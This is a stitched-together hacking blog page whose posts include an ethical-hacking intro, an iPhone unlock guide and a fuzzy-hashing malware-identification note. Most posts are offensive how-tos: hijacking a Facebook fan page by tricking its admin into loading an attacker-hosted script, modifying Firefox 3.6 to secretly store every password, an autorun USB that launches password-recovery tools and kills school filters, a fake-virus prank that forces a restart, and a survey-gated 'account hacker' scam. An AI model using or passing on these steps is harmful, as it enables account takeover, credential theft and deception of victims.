What is Ethical Hacking: An Introduction

Ethical Hacking: An Introduction

Whenever term hacker comes before many people consider it as a guy sitting inside a room or garage with a bottle or beer and a Laptop or Desktop doing wonders on click of buttons. But the reality check is hacking is not that easy as portrayed in movies and television and term hacker doesn't mean a computer criminal.

So here first of all we'll clear all our misconceptions related to words hackers and hacking.

From Where This Word Came:

The word hacking has history in late 1960's, the time when computers were nothing but mighty pieces of machines and a computer just meant a machine that can compute. Electrical and Electronics geeks used to optimize circuits to make any system/circuit work faster, better and reliably. The job they used to do on circuits was known as hack. With time computer geeks also started finding way out to optimize their system to work better so in fact hacking was nothing but always a kind of reverse engineering. With time in professional world a word hacker got meaning, a person who is highly skilled in hardware, software and networking components. Then movies started portraying hackers do only dirty works and hence today the word hacker has a negative face according to people. No matter how the word met to a dreadful end a hacker always had all qualities that was first put forward in its definition may the be criminal or ethical. Criminal hackers are also known as Crackers.

Types Of Hackers:

White Hats: White hat hackers are good guys who use their hacking skills for defensive purposes. Organizations and industries pay them high salaries to protect their systems and networks from intrusion.

Black Hats: Black hats are actually bad guys in filed. Their main job is to breach security and make money. They make money by using their hacking skills for offensive purposes.

Grey Hats: Gray hats are hackers who work for offensive and defensive purposes depending on situations. They are hired by people to intrude and protect systems.

Hactivist: A hacktivist is kinda hacker who thinks hacking can bring out some social changes and hacks government and organizations to show his discomfort over some trivial issues.

Suicide Hackers: Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.

Script Kiddie: A script kiddie is a person who boasts breaking system using scripts and codes written by others though he hardly knows what the code does.

Phreak: It is a person who tries to intrude systems for fun or malicious personal activities. Mostly they are children of age 12-15 who don't even know wrong consequences of hacking.

Types Of Hacking:

Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger and RATs

Remote Hacking: Remote hacking is done on a remote system using Internet.

Social Engineering: Social Engineering is kinda interacting skill that a hacker uses to manipulate people giving out sensitive information. Its kinda trick done using good verbal, social skills and understanding.

Terminologies Used Under Hacking:

Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.

Vulnerability: A vulnerability is an existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions to the system. In easy word vulnerability is weakness in system.

Payload: Payload is agent that helps in taking advantage of vulnerability in remote hacking.

Attack: An attack occurs when a system is compromised based on a vulnerability.

Types Of Attack:

1.Operating System Attack

2.Application level Attack

3.Shrink Wrap Code Attack

4.Misconfiguration Attack

Operating system attack is attack done on specific type of OS. Such attack is done using flaws in programs and services shipped with OS. Application level attack is done over faulty coding practices done over software during its development. Shrink Wrap Code attack are attacks done over UN-refined scripts used for making task simpler. Last is misconfiguration attack, it is kinda attack which is done over mis-configured system or a system with default settings.

Work Of An Ethical Hacker:

Job of an ethical hacker is to use all his skills and tools used by malicious hackers to find vulnerabilities in system and then provide it security against those vulnerabilities.

Conclusion: At last what I want to tell, nothing happens in clicks of buttons. A hacker is highly skilled person in field of computing who usually have ample knowledge about software, hardware, OS, networking and programming. A hacker may it be criminal or ethical has immense patience, determination, organization, discipline and persistence. An attacker may spend months of time planning, analyzing and executing an attack. This shows his level of dedication to achieve whatever goal he/she has set. A person can never become a good hacker unless he have all above qualities.

Note: Now onwards we will cover hacking as our main stream topic on this blog. Real hacking is never done over lamers who hardly knows about security, it is done over a person who is highly skilled as you are. You can never learn hacking until you do some practical and gain knowledge about field so now onwards I urge you to perform practicals that will be now posted on this blog on your own system. Next no tutorial will be taken as a lamer so they will be in possible higher details, so this may happen that you may not understand something. Rather than keeping yourself mum I plea you to please ask whenever you encounter a problem or get bothered by topic. Whenever I 'll post on hacking I 'll try to keep a theoretical and one practical tutorial, you are requested to read both and grasp matter completely. Thanks for visiting and please tell are you clear with all points discussed or need some explanation on your difficulty.

Read More

How to Hack Facebook Fan Page

Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.
Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
1. Download the exploit from this Link.
2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.
3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.
4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)
5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)

Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

Read More

How To Hack A Facebook Account By Code Black (Download Free Hacking Tool)

I would like to welcome you to the release of the Code Black Facebook Account Hacker V3.1. Our CodeBlack Team heard your cry loud and clear! So from now on instead of trying to find the email of the person your trying to hack as the program above shows you can now use the user id instead. Hopefully this will make things a lot easier for you guys. We try to keep our users satisfied at all times. For the tutorial on how find the user id is below just in case you don't know how yet. 

Click me to watch video for tutorial and proof or follow instructions below. 

1. Enter the email of the account that you would like to hack. 
(Update 3.1)( User ID now accepted)

2. Click "Click Here" button.
3. Then wait until the password shows up in the "password" field.

4. Then just copy & paste email and password on facebook login page.

We have decided to protect the file with a gateway lock, meaning that you have to fill in a short survey. The surveys are free and only take a couple of minutes, so either download it or don't. We hope that this new gateway will limit the number of downloads to only 10,000 people. If you find any bugs, please report them by commenting on the blog or emailing Support@CodeBlack.com. Also note you will receive lifetime updates. Here is the download:
Need Help Downloading the File (Click Here)

Mirror Link

Total downloads: 9,690

Read More

How To Unlock an iPhone A step-by-step guide to unlocking the iPhone's SIM card and making it available to other cell carriers' networks

If you're one of the million people who've purchased an iPhone since the end of June, you probably signed up with Apple's exclusive carrier in the U.S., AT&T, when you activated your phone. That means your iPhone identifies itself to AT&T's network using an AT&T SIM card, a smart card that's located in a small tray between your iPhone's sleep/wake button and its recessed headphone jack.
But what if you're planning a trip to Europe and rather than paying AT&T to use the networks of its European partners, you want to take advantage of the favorable rates and local phone numbers offered by replacing your AT&T SIM card with a pre-paid European card? Or what if you'd prefer to use T-Mobile as your cellular provider, rather than AT&T?
In the past month several groups have announced that they've found a way to "unlock" the iPhone, allowing it to use a SIM card from any provider. (Keep in mind that this is only half the story: the iPhone uses the GSM radio band for its communications, meaning that it'll only work with providers that use the GSM network. In the U.S., that means T-Mobile and AT&T.)
In August, a group of hackers demonstrated a method for unlocking SIM cards and sold its software to resellers, who in turn began selling it to the public for as much as $100 last week.
But another group has came up with its own hack that, with the help of some free, open-source software, lets you unlock your iPhone in about an hour, free of charge. Below, I'll show you how it works - and it does work, because I've used this technique to unlock my own phone. (One important caveat: Certain AT&T-only features, such as Visual Voicemail, will not work when you're connected to other cellular networks.)
Before we get started, you'll want to disable the iTunes helper application that may get in the way of the installation. Make sure iTunes is not running, then open OS X's Activity Monitor in the Utilities folder of the Applications folder. Search for or scroll down to iTunes Helper, select it, and then click on the Quit Process button in the top left of the screen. You'll also need your iPhone, your data cable, and a Wi-Fi connection to the Internet.
(If you haven't already activated your iPhone with AT&T-and aren't planning to-you need to conduct a fake activation. To do this, you'll need to follow the excellent instructions at ModMyiPhone and download and install a program called iNdependence.)

Install AppTapp

Apple doesn't support the installation of third-party applications on the iPhone, but the enterprising developers at NullRiver have created a program called AppTapp that will let you install including chat clients, games, and other pieces of software - including those that are needed to unlock your iPhone. (For more detailed instructions on using AppTapp,
Download and install AppTapp. Once you run the program, the first thing it will do is ask what version of the firmware you're running. If you've just updated your iPhone, you probably have Firmware 1.0.2-select that and click on Continue.

Assuming all goes well, you should get a screen that begins with the words: "Congratulations! You have successfully installed AppTapp Installer onto your iPhone." You should then find a new application on the iPhone's home screen called Installer.
The next instructions will require downloading some applications from the Internet to your iPhone-so make sure your iPhone is connected to a WiFi network. Launch the Installer program, and you'll see a long list of various applications that you can install. Scroll down, then select and install-in order-Community Sources, BSD Subsystem and OpenSSH.

Perform the GSM Unlock

First, download and install Unlock.app, lockdownd, and Cyberduck.
Then go to the iPhone's General settings and set Auto-Lock to Never. Next, you'll need to get your iPhone's IP address on your local network. To do this, go to Settings: Wi-Fi and click on the blue arrow next to the network that you're connected too. Write down the IP address, as you'll need it for later.
Now, open Cyberduck and click on the Open Connection button in the top left of the window. In the connection window, type the IP address that you just noted. Make sure that SFTP (SSH Secure File Transfer) is selected, and that you are using Port 22. For the username, type root, with the password of dottie.
Once connected, navigate from /private/var/root to the main directory by choosing the / item. Next, navigate to /usr/libexec and drag the file named lockdownd (the one you downloaded earlier) into it. It will ask if you want to overwrite the existing file-click on Continue to do so.
Now, in Cyberduck, drag the Unlock file from the Mac's desktop into the /Applications folder at the top of the main window. Once that's done, turn off your iPhone and remove the SIM card, then turn your iPhone back on and choose the application on your iPhone called Unlock.
Assuming everything went smoothly, there should be a white screen that says "All files found. Ready to go. Press Start." Once you press start, it will take about 20 minutes for all the files to install.
The progress messages will appear at the top of the screen as it progress-once you see "Completed" then you're finished. Insert a new SIM card of your choosing into your iPhone. Congratulations, you've just unlocked your iPhone!
(If you're planning on using a T-Mobile SIM card in your iPhone, you'll want to modify the iPhone's settings. Follow the instructions at the bottom of the ModMyiPhone tutorial to make sure the settings you enter conform to your T-Mobile data plan.)

The aftermath

One Macworld editor tried this approach - minus the faux-activation step - on his iPhone and was able to insert a T-Mobile SIM card from a co-worker and get the iPhone up and running on the T-Mobile network, as if it were her phone.
(To swap SIM cards in your iPhone, insert an unfolded paper clip into the small hole in the top of the iPhone, next to the headphone jack. This will open the iPhone's SIM card slot, allowing you to remove your AT&T card and replace it with a different one.)
We don't know if future Apple iPhone updates will break this functionality. But if you're about to embark on a European vacation, or if you avoid downloading those iPhone updates, this method will allow you to use the SIM cards of other cellular providers in your iPhone, provided that those providers also use the GSM cellular radio frequencies.

Read More

Top 10 Ways How Hackers Can Hack Facebook Accounts In 2011

13

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking here at THC4U, In my previous post which I wrote in 2010 related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2011, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2010.

10 Ways How Hackers Can Hack Facebook Accounts In 2011

So here are the top 10 methods which have been the most popular in 2011:

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

I have explained the step by step phishing process in my post below:

• How To Hack Facebook Password

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware" to this topic.

3. Stealers 

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.

Further Information

• Gmail Cookie Stealing And Session Hijacking Part
• Gmail Cookie Stealing And Session Hijacking Part 2

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:

• Firesheep Makes Facebook Hacking Easy

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

• Usb password stealer To Hack Facebook Passwords

9. Man In the Middle Attacks


If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:

• Man In the Middle Attacks With SSL Strip

If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.

10. Botnets 

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.


Facebook Hacking Course
Facebook hacking course is a facebook security course created by me, which tells you exactly how how hackers can compromise your facebook accounts and what can you do to protect your facebook accounts from getting hacked.



Hope you have enjoyed reading the post as much i did while writing.

Note: Copying or reproducing this article is strictly prohibited and will lead to certain consequences, If you are reproducing or copying this article, make sure that you give a proper credit.

Read More

Beware! Facebook Scam "Yeahh!! It happens on Live Television!"

we recently covered about a facebook worm which targeted a whole lot of facebook users. It's really sad to see that these types of scams keep growing and facebook hasn't really been able to successfully give protection to their users from such scams.

A new bloke in the list "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like a wildfire among facebook users.


The following status on one of my friend's wall bought my attention first towards this scam:

Yeahh!! It happens on Live Television![LINK] 

Lol Checkout this video its very embracing moment for her

The lady is the above screen shot is Marika Fruscio an Italian Model, She had Wardrobe malfunction (Accidental exposure of intimate parts) on a live TV show, which is what the scam refers to.

On clicking the link, Facebook users are directed to the folllowing page:

In order to play the video the user has to click the button "jaa", which appears as an age verification system required in order to watch the video. when you click on "jaa" you are infact clicking on a hidden link which consequently post the same link on each of your contact's wall. Next a survey is prompted which the user needs fill in order to watch the video, thus helping the scammers make tons of money.

While searching related to the scam on the internet, I managed to find the source code of the scam on pastebin, This proves that there is not a single body behind this scam, with the source code available in public, any one could create a website and inject the malicious javascript in to it and start scamming.

http://pastebin.com/8y4X2hxj

One more thing to note is that in most such cases blogspot blogs are being targeted as they are free to create, You can create a blog in less than 5 minutes. If this keeps growing, I believe that blogger will stop giving free blogspot blogs and will maybe switch to a payed system or facebook would just disable blogspot domains from being shared, thus making it difficult for real bloggers to market their blogs.

How To Remove The Scam?


It's fairly easy to remove the scam, all you need to do is to report it to facebook.

Read More

Computer Pranks |Easy Method To Make Fake Facebook Virus

In this tutorial I will show you how to make a  Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ..........."


3)Save as Internet Explorer .bat

4)Right click on Internet Explorer .bat and click Create Shortcut

5)Right click on shorcut and click Properties.

6)Click Change Icon

7) Choose Internet Explorer icon or similar , click OK , then click Apply

8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:


After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !
Also Read = How To Get Rid Off From Facebook Viruses

Read More

How to make a facebook virus

I heard from many of my friends that a virus is spreading on facebook which delete our accounts,I first thought it could have been a trojan that spread out,Then i found out that its just simple prank to shutdown your pc,Now today i will show you how to make a facebook virus to trick your friends
In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
Making a fake facebook virus!

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

3) Save it as something.bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
6) Click Change Icon
7.Choose Internet Explorer icon or similar , click OK , then click Apply

Now your facebook virus is almost ready


8).Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:

Also Read = Easy Method To Make Fake Facebook Virus
Related To This Post =How To Get Rid Off From Facebook Viruses 

Read More

How to Identifying unknown files by using fuzzy hashing

Over the last couple of years I have captured about 2 gigabytes of malware using the Dionaea honeypot. Analysing and identifying those files can mostly be done by sites as Virustotal, Anubis or CWsandbox. By modifying the ihandler section in the dionaea.conf this can be done fully automated.
Every now and then even these excellent analysis sites come up with nothing. No result or whatsoever. This could be because its a brand new sample of malware which simply isn't recognised yet or it is a morphed sample of a known and existing one.

There still is a method to determine what kind of malware the file represent. This method is called fuzzy hashing. The technique finds its origin in spam filtering (spamsum)
From the README file:

“spamsum is a tool for generating and testing signatures on files.  The signature is designed to be particularly suitable for producing a result that can be used to compare two emails and see if they are 'similar'. This can provide the core of a SPAM detection system.

The algorithms in spamsum are in two parts. The first part generates a signature which is encoded as a string of ascii characters less than 72 characters long. The second part takes a new signature and a database of existing signatures (actually just a text file with one
signature per line) and finds the existing signature that best matches the new signature. A match result in the range of 0 to 100 is generated, where 100 is a perfect match and 0 is a complete mismatch.”

A similar tool based on spamsum is SsDeep maintained by Jesse Kornblum (if you google for it, a link to a sourceforge page shows up. This site is down on the time of writing this text but there are ubuntu packages available in the ubuntu package-tree. So a apt-get install ssdeep should do the trick ).

So this can be done for unrecognized malware as well. By generating a hash from the alleged malware, we can compare it against the 2 gigabyte collection already caught and identified malware.

By using ./ssdeep -lr 11a1f1acc4ed824dc1e332ce8c2fd50e > testhash

you generate a file that looks like this:
ssdeep,1.0--blocksize:hash:hash,filename
3072:GiSkUYBQgZ+z1vezLPVr7Qe4lAtWhazqiatiPiHpOKeXmPFYZK/z:Gi3BBZ+5v0LtQx+tQauieHAXCFycz,"11a1f1acc4ed824dc1e332ce8c2fd50e"


So if we do: ./ssdeep -lrm testhash .

snip
./3a74bc105edfe54445d1fca28cc4f542 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (99)
./556b6807d33ebfe2ec95f3598e168f62 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (85)
./daf46feccab82f6c86daae4f366bfbe1 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (75)
./3bcd999965892aea89be5606f6811bfa matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (69)
./33a91a9ed61fe8f59190f4d73791bf06 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (82)
./525fc4565d588c11a5b56aaf4f3c7a12 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (99)
./fead84c5df2e585749a8da2ce583c926 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (99)
/snip

So for example, if we take out the last result “fead84c5df2e585749a8da2ce583c926” and run a clamscan against it, we come up with the following result:

fead84c5df2e585749a8da2ce583c926: Worm.Kido-175 FOUND

Where daf46feccab82f6c86daae4f366bfbe1 seems to match with Worm.Kido-268 FOUND. Another variant from the same malware family.

We we can safely assume that the file is for 99 percent the same as “11a1f1acc4ed824dc1e332ce8c2fd50e” and is a variant of Kido-175
Probably the same malware has been identified under different names. So, to be sure we have identified it correctly, we can also match it to other 99% matches in the list, e.g. "3a74bc105edfe54445d1fca28cc4f542".

To sum up: All matches seem to indicate that this particular piece of malware is _some_ variant of Kido. Possibly a new incarnation. Even if we can't pinpoint which type it is exactly, we still can make some educated guesses as to the family and its dangers. Knowing what a certain malware tends to do (e.g. it tries to find a C&C server for further instructions) we can assess the potential threat this piece of malware poses. If all connections to C&C servers are blocked (because all known C&C are filtered and the usual IRC traffic blocked) an infection with this type of malware doesn't immediately mean a widespread breakout or data-leakage.

So, even if the md5 checksums don't match, fuzzy hashing can come in handy to identify unknown and suspicious files.

Read More

Stealing Passwords with FireFox 3.6.X

-[ Introduction ]-

Most users trust their browser, some trust it with everything, while others like to keep their passwords safe in their heads.  Is there a way to leverage this trust and collect passwords from the not so trusting, after all if you want to surf the internet your going to have to trust something with your password.

-[ The Challenge ]-  Make FireFox 3.6.X auto-magically remember passwords, usernames and URLs.  A quick Google revealed that some researchers are making changes "Hack'ing" nsLoginManagerPrompter.js to remove the save password notification, but i found an issue with just Hacking up nsLoginManagerPrompter.js so i did what all hackers do! "Hack to Learn, don't learn to hack.."

-[ FireFox 3.6.X ]-
Ok so Google reveled FireFox uses some .js files to control the Prompter and a quick find command shows us a few more

# find /usr/ -type f | grep Login | grep firefox
nsLoginManagerPrompter.js
nsLoginManager.js
nsLoginInfo.js

The great news is there are only 3 files,  even better we only need to hack up 2 out of the 3 to get this working FULLY!  a quick inspection of nsLoginInfo.js revealed that we can leave this file as is, leaving only two files and a few thousand lines of code to read.

-[ # sudo nano ./nsLoginManagerPrompter.js ]-
The first hack goes like this, When NEW account details are entered the Prompter displays the dialogue, if the user wants to have the details remembered the button calls pwmgr.addLogin(aLogin); all other options result in the details not being saved.  if we take this call pwmgr.addLogin(aLogin); and add it after the var pwmgr = this.pwmgr; call, the details get saved no matter what the user selects, the best part about this method is the dialogue is displayed and the user get the choices they are used to seeing.

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
        var buttons = [
            // "Remember" button
            {
                label:     rememberButtonText,
                accessKey: rememberButtonAccessKey,
                popup:     null,
                callback: function(aNotificationBar, aButton) {
                    pwmgr.addLogin(aLogin);
                }
            },
            // "Never for this site" button
            {
                label:     neverButtonText,
                accessKey: neverButtonAccessKey,
                popup:     null,
                callback: function(aNotificationBar, aButton) {
                    pwmgr.setLoginSavingEnabled(aLogin.hostname, false);
                }
            },
            // "Not now" button
            {
                label:     notNowButtonText,
                accessKey: notNowButtonAccessKey,
                popup:     null,
                callback:  function() { /* NOP */ }
            }
        ];

The second hack needs to remove the change confirmation dialogue, if not we reveal that the details are stored and that we want to change them, this is not good! so we are looking for a way to accept the changes no matter what, and never display the dialogue. we again find the code var pwmgr = this._pwmgr; and again look at the button code, we always want YES so the call to pwmgr.modifyLogin(aOldLogin, aNewLogin); is what we need but this time we don't want to display the dialogue at all, so using a code comment, we comment out the button code apart from the call that saves the changed password.

var pwmgr = this._pwmgr;
//        var buttons = [
            // "Yes" button
//            {
//                label:     changeButtonText,
//                accessKey: changeButtonAccessKey,
//                popup:     null,
//                callback:  function(aNotificationBar, aButton) {
                    pwmgr.modifyLogin(aOldLogin, aNewLogin);
//               }
//           },
            // "No" button
//            {
//                label:     dontChangeButtonText,
//                accessKey: dontChangeButtonAccessKey,
//                popup:     null,
//                callback:  function(aNotificationBar, aButton) {
                    // do nothing
//                }
//            }
//        ];

Now we are left with a Prompter that lies and steals passwords, no matter what choice the user makes.

-[ # sudo nano ./nsLoginManager.js ]-
The third and final hack is to make sure that once we have the details they are not used by FireFox, as this would indicate that the browser has them and that's not good, we want to store them for US not the user, so we just need to find the call that adds them to the page and comment it out.

_domEventListener : {
        _pwmgr : null,
        QueryInterface : XPCOMUtils.generateQI([Ci.nsIDOMEventListener,
                                                Ci.nsISupportsWeakReference]),
        handleEvent : function (event) {
            if (!event.isTrusted)
                return;
            this._pwmgr.log("domEventListener: got event " + event.type);
            switch (event.type) {
                case "DOMContentLoaded":
//                    this._pwmgr._fillDocument(event.target);
                    return;


Now we have hacked FireFox 3.6.X to store ALL and EVERY useful detail of the accounts used in the browser, we can just leave it in place for a while and wait for the accounts to increase, before going back to the

• [Edit]-->[Preferences] menu within Firefox clicking the [Security] tab followed by the [Saved Passwords] button.

you are given a list of usernames and sites, all that's left are the passwords, just click

• [Show Passwords]

to see the password strings revealed .

-[ Conclusion ]-
Using a shared browser is bad news, unless your the one doing the sharing, but by knowing you can and should click the [Remove] button you are better protected against this type of attack, and now maybe more inclined to check before you [Exit].
Unless your sure the system your using is safe then don't use it for anything you wouldn't want anyone else to to find, this was just some simple fun just to see if i could, but if deployed i would see no reason why accounts would not be compromised.

-[ The END ]-

Read More

How to Make an Auto-Hacking USB Drive

image not found

i

I will teach you how to make a basic Auto-Hacking USB Drive. There are probably many different variationsof this. I will be showing you the most basic.

You need two things:
1) A USB Drive devoted to this
2) The programs and files that I will show you how to make or where to get. If you have trouble making the two files that I show you how to create, they can be downloaded at the end of the Instructable.

OK PEOPLE!!!!!
THIS AUTO-HACKING USB DRIVE SIMPLY CONTAINS APPLICATIONS THAT RECOVER PASSWORDS AND SUCH. STOP LEAVING POSTS ABOUT HOW YOU DON'T UNDERSTAND WHAT GETS HACKED.

 

Step 1A Brief Explanation

image not found

i

OK. If you are looking for an Instructable that will teach you how to hack the Pentagon with a 2GB USB Drive, look somewhere else. This Instructable uses a batch file, an autorun file, and downloaded programs.

image not found

i

«

• 
  
• 
  

So. Here we go. We will start with the Autorun file.

This file is the one that makes the pop-up window when you plug in the USB Drive. You can use this on any USB Drive, even if it has U3 on it.

Open Notepad (I'm using Notepad++) and type the following:

(autorun)
label=(Name you want the drive to have)
icon=(Icon file).ico
open=(Batch file we will make later).bat
action=(What you want the action to be)

MAKE SURE YOU DO NOT TYPE THE ()'s! Where it says (autorun), replace the parentheses with brackets (the buttons to the right of the "p" key on the keyboard. USE THE BOTTOM BRACKETS, NOT THE TWISTY FRENCH BRACKETS!)

Save this file as Autorun.inf

Make sure that you save it immediately inside your USB Drive, not inside any sub-folders (My Computer, Autohax0r).

Also, I have used an icon (an .ico file), so the USB Drive will have a different picture than the boring standard picture. To get one of these, I advise going to http://www.iconarchive.com/ to get an .ico file (you have to specifically download it as .ico). If you do this, save the icon in the same place as the Autorun file.

 

image not found

i

«

• 
  
• 
  
• 
  

We will now make the batch file that starts all the "hacking programs." MAKE SURE YOU NAME IT THE SAME AS WHAT YOU CALLED IT IN THE AUTORUN FILE!

Type this into Notepad:

@echo off
title KTX
start .\Applications\FOLDER\APPLICATION.exe
start .\CommandLine\Process.exe -k TermX.exe
start .\CommandLine\Process.exe -k WinVNC.exe
pause
goto eof

I will explain the commands used:
@echo off: Makes it so the file pops-up without showing the commands. Makes it look more professional.

title: Makes a title at the top of the batch file.

start: If you can't figure this one out, you should not be reading this Instructable.

pause: Pauses the file, waits for you to press any button.

goto: Sends the file to a different part of the script.

eof: End of file.

Also, TermX.exe is a program that my school uses to keep us out of certain websites. IT IS NOT THE FIREWALL. For info on WinVNC.exe, go to http://www.processlibrary.com/directory/files/winvnc.

Where it says \FOLDER\APPLICATION, you will change this in two steps.

Save this as KTX.bat, and place it in the same place (directory) as the Autorun.inf file.

Step 4The "Hacking" Programs

image not found

i

«

• 
  

Ok. We are now going on to the actual hacking programs. Go to http://www.nirsoft.net/, and browse the programs. If you have any different websites or programs, feel free to use them. I am using SniffPass, LSASecretsView, and WirelessKeyView. Install them, and place them and the folders they create in the same directory as all the other stuff.

Your computer might identify some as viruses, but don't worry. It only does this because some programs can find certain passwords.

Also, you might notice that I have a folder called "CommandLine." This is a VERY usefull program, and can be downloaded at http://www.beyondlogic.org/solutions/processutil/processutil.htm. There is also a hearty description at this page. 

Step 5Modifying KTX.bat

image not found

i

«

• 
  

It is now time to go back to KTX.bat (by the way, remember that TermX.exe thing I mentioned? Well, KTX stands for "Kill TermX". Feel free to change the batch file name to whatever you want, just MAKE SURE TO ADJUST THE AUTORUN FILE, TOO!).

Go to the part of the Autorun file where it says "start .\Applications\FOLDER\APPLICATION.exe". You are going to change this. Also, add or subtract as many of this line as you need. If you have three programs to run, you need three lines of this code.

First, create a folder in the same place as the Autorun and KTX files, and name it Applications. Drag all the folders that contain the hacking programs into the Applications folder. You should come up with a directory like this:
"My Computer\AutoHax0r\Applications\HACKING FOLDERS HERE (with programs inside the folders)"

Also, you do not have to have the CommandLine in the KTX file. I just use it for my school.

 

Step 6All Finished!

image not found

i

«

• 
  
• 
  

